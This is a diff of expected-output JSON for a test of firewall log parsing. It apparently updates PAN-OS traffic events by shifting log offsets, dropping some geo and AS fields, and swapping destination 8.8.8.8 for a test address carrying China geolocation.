         "destination.bytes": 379,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.222.222",
         "destination.nat.ip": "208.67.222.222",
         "destination.nat.port": 443,
@@ -4931,7 +4861,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 23756,
+        "log.offset": 23896,
         "network.application": "dnscrypt",
         "network.bytes": 681,
         "network.community_id": [
@@ -5034,7 +4964,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 24282,
+        "log.offset": 24422,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -5108,14 +5038,7 @@
         "client.packets": 1,
         "client.port": 43393,
         "destination.address": "208.67.220.220",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 133,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.220.220",
         "destination.nat.ip": "208.67.220.220",
         "destination.nat.port": 443,
@@ -5143,7 +5066,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 24789,
+        "log.offset": 24929,
         "network.application": "insufficient-data",
         "network.bytes": 231,
         "network.community_id": [
@@ -5218,14 +5141,7 @@
         "client.packets": 1,
         "client.port": 50971,
         "destination.address": "208.67.222.222",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 133,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.222.222",
         "destination.nat.ip": "208.67.222.222",
         "destination.nat.port": 443,
@@ -5253,7 +5169,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 25326,
+        "log.offset": 25466,
         "network.application": "insufficient-data",
         "network.bytes": 231,
         "network.community_id": [
@@ -5357,7 +5273,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 25863,
+        "log.offset": 26003,
         "network.application": "google-base",
         "network.bytes": 4694,
         "network.community_id": [
@@ -5431,14 +5347,7 @@
         "client.packets": 1,
         "client.port": 51536,
         "destination.address": "208.67.220.220",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 91,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.220.220",
         "destination.nat.ip": "208.67.220.220",
         "destination.nat.port": 53,
@@ -5466,7 +5375,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 26406,
+        "log.offset": 26546,
         "network.application": "dns",
         "network.bytes": 166,
         "network.community_id": [
@@ -5541,14 +5450,7 @@
         "client.packets": 1,
         "client.port": 47099,
         "destination.address": "208.67.222.220",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 133,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.222.220",
         "destination.nat.ip": "208.67.222.220",
         "destination.nat.port": 443,
@@ -5576,7 +5478,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 26927,
+        "log.offset": 27067,
         "network.application": "insufficient-data",
         "network.bytes": 231,
         "network.community_id": [
@@ -5651,14 +5553,7 @@
         "client.packets": 1,
         "client.port": 38028,
         "destination.address": "208.67.220.222",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 133,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.220.222",
         "destination.nat.ip": "208.67.220.222",
         "destination.nat.port": 443,
@@ -5686,7 +5581,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 27464,
+        "log.offset": 27604,
         "network.application": "insufficient-data",
         "network.bytes": 231,
         "network.community_id": [
@@ -5761,14 +5656,7 @@
         "client.packets": 1,
         "client.port": 39688,
         "destination.address": "208.67.220.220",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 131,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.220.220",
         "destination.nat.ip": "208.67.220.220",
         "destination.nat.port": 53,
@@ -5796,7 +5684,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 28002,
+        "log.offset": 28142,
         "network.application": "dns",
         "network.bytes": 212,
         "network.community_id": [
@@ -5871,14 +5759,7 @@
         "client.packets": 2,
         "client.port": 56601,
         "destination.address": "208.67.220.220",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 212,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.220.220",
         "destination.nat.ip": "208.67.220.220",
         "destination.nat.port": 53,
@@ -5906,7 +5787,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 28523,
+        "log.offset": 28663,
         "network.application": "dns",
         "network.bytes": 362,
         "network.community_id": [
@@ -6009,7 +5890,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 29044,
+        "log.offset": 29184,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -6112,7 +5993,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 29550,
+        "log.offset": 29690,
         "network.application": "web-browsing",
         "network.bytes": 4694,
         "network.community_id": [
@@ -6215,7 +6096,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 30071,
+        "log.offset": 30211,
         "network.application": "google-base",
         "network.bytes": 7054,
         "network.community_id": [
@@ -6317,7 +6198,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 30618,
+        "log.offset": 30758,
         "network.application": "ssl",
         "network.bytes": 905,
         "network.community_id": [
@@ -6419,7 +6300,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 31121,
+        "log.offset": 31261,
         "network.application": "ssl",
         "network.bytes": 839,
         "network.community_id": [
@@ -6521,7 +6402,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 31624,
+        "log.offset": 31764,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -6623,7 +6504,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 32124,
+        "log.offset": 32264,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -6696,17 +6577,18 @@
         "client.nat.port": 28825,
         "client.packets": 1,
         "client.port": 60824,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 129,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -6720,7 +6602,7 @@
         "event.end": "2020-03-27T09:56:57.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "527 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,8108,1,60824,53,28825,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:57,0,any,0,2825848,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "527 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,8108,1,60824,53,28825,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:57,0,any,0,2825848,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:56:57.000+01:00",
         "event.timezone": "+01:00",
@@ -6732,12 +6614,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 32624,
+        "log.offset": 32764,
         "network.application": "dns",
         "network.bytes": 226,
         "network.community_id": [
-            "1:A2+HwT4AIF06UL20njpr+jOEHbA=",
-            "1:EcekfyB2F1ffbgDiS52p2Ave8cw="
+            "1:QO0fcVmrRB7hqxqPZOyjNVIPNMA=",
+            "1:t6W2RtxCtwPyDggireHusa67LPY="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -6754,12 +6636,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "8108",
-        "panw.panos.network.nat.community_id": "1:EcekfyB2F1ffbgDiS52p2Ave8cw=",
+        "panw.panos.network.nat.community_id": "1:t6W2RtxCtwPyDggireHusa67LPY=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825848,
         "panw.panos.source.interface": "ethernet1/3",
@@ -6775,13 +6657,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 129,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6806,17 +6688,18 @@
         "client.nat.port": 29739,
         "client.packets": 1,
         "client.port": 42403,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -6830,7 +6713,7 @@
         "event.end": "2020-03-27T09:57:27.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7601,1,42403,53,29739,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:27,0,any,0,2825849,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7601,1,42403,53,29739,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:27,0,any,0,2825849,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:27.000+01:00",
         "event.timezone": "+01:00",
@@ -6842,12 +6725,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 33131,
+        "log.offset": 33281,
         "network.application": "dns",
         "network.bytes": 97,
         "network.community_id": [
-            "1:SYwY/Oxa91Bxljqt7vOeKmkB6Tc=",
-            "1:kYnMEX654pUoP/CF8LWGKoQ5Bts="
+            "1:PIx6LwSPeBDAwHH76WeCFFgGd/o=",
+            "1:pW9XWgM8GVh/uQ+kJhyhgsKan6U="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -6864,12 +6747,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "7601",
-        "panw.panos.network.nat.community_id": "1:kYnMEX654pUoP/CF8LWGKoQ5Bts=",
+        "panw.panos.network.nat.community_id": "1:PIx6LwSPeBDAwHH76WeCFFgGd/o=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825849,
         "panw.panos.source.interface": "ethernet1/3",
@@ -6885,13 +6768,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -6916,17 +6799,18 @@
         "client.nat.port": 24414,
         "client.packets": 1,
         "client.port": 35615,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -6940,7 +6824,7 @@
         "event.end": "2020-03-27T09:57:27.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,6818,1,35615,53,24414,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:27,0,any,0,2825851,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,6818,1,35615,53,24414,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:27,0,any,0,2825851,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:27.000+01:00",
         "event.timezone": "+01:00",
@@ -6952,12 +6836,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 33632,
+        "log.offset": 33792,
         "network.application": "dns",
         "network.bytes": 98,
         "network.community_id": [
-            "1:E6VJqcuMoS+c2cZlIr8+Bs6VQX0=",
-            "1:XW3vdS0fzu9SOj7mK2wyCPxwJ0M="
+            "1:0bQdeqrtxBjBM+ZRhT64rXdwqs0=",
+            "1:IetYHlDh9cpB1axIwU2LUlltpp0="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -6974,12 +6858,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "6818",
-        "panw.panos.network.nat.community_id": "1:E6VJqcuMoS+c2cZlIr8+Bs6VQX0=",
+        "panw.panos.network.nat.community_id": "1:IetYHlDh9cpB1axIwU2LUlltpp0=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825851,
         "panw.panos.source.interface": "ethernet1/3",
@@ -6995,13 +6879,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -7056,7 +6940,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 34133,
+        "log.offset": 34303,
         "network.application": "google-base",
         "network.bytes": 4605,
         "network.community_id": [
@@ -7158,7 +7042,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 34676,
+        "log.offset": 34846,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -7260,7 +7144,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 35182,
+        "log.offset": 35352,
         "network.application": "ssl",
         "network.bytes": 19474,
         "network.community_id": [
@@ -7363,7 +7247,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 35718,
+        "log.offset": 35888,
         "network.application": "web-browsing",
         "network.bytes": 4605,
         "network.community_id": [
@@ -7436,17 +7320,18 @@
         "client.nat.port": 52306,
         "client.packets": 1,
         "client.port": 56089,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 140,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -7460,7 +7345,7 @@
         "event.end": "2020-03-27T09:56:56.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "528 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,6830,1,56089,53,52306,53,0x400064,udp,allow,248,108,140,2,2020/03/27 09:56:56,0,any,0,2825839,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "528 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,6830,1,56089,53,52306,53,0x400064,udp,allow,248,108,140,2,2020/03/27 09:56:56,0,any,0,2825839,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:56:56.000+01:00",
         "event.timezone": "+01:00",
@@ -7472,12 +7357,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 36239,
+        "log.offset": 36409,
         "network.application": "dns",
         "network.bytes": 248,
         "network.community_id": [
-            "1:/Xjy04gjbQQiz3Dm/r+6kj+GMg0=",
-            "1:G2ek0+shjHpXaDjxrlNsc5sJLuQ="
+            "1:+Bi397gWCvDpubqZgGi15vdsVpU=",
+            "1:LgeFVvQKO41To+dxyXoHYnibnx4="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -7494,12 +7379,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "6830",
-        "panw.panos.network.nat.community_id": "1:/Xjy04gjbQQiz3Dm/r+6kj+GMg0=",
+        "panw.panos.network.nat.community_id": "1:+Bi397gWCvDpubqZgGi15vdsVpU=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825839,
         "panw.panos.source.interface": "ethernet1/3",
@@ -7515,13 +7400,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 140,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -7575,7 +7460,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 36747,
+        "log.offset": 36927,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -7677,7 +7562,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 37253,
+        "log.offset": 37433,
         "network.application": "ssl",
         "network.bytes": 20666,
         "network.community_id": [
@@ -7779,7 +7664,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 37789,
+        "log.offset": 37969,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -7852,17 +7737,18 @@
         "client.nat.port": 24891,
         "client.packets": 1,
         "client.port": 40729,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -7876,7 +7762,7 @@
         "event.end": "2020-03-27T09:57:23.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6907,1,40729,53,24891,53,0x400000,udp,allow,95,95,0,1,2020/03/27 09:57:23,0,any,0,2825832,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6907,1,40729,53,24891,53,0x400000,udp,allow,95,95,0,1,2020/03/27 09:57:23,0,any,0,2825832,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:23.000+01:00",
         "event.timezone": "+01:00",
@@ -7888,12 +7774,12 @@
         "fileset.name": "panos",
